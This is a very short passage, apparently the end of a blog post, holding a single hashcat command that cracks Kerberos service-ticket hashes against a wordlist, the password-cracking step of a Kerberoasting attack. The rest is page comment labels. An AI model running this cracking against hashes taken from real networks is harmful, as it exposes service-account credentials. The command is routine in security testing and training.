hashcat -m 13100 kerb.txt wordlist.txt
```</b>
Comments
Post a Comment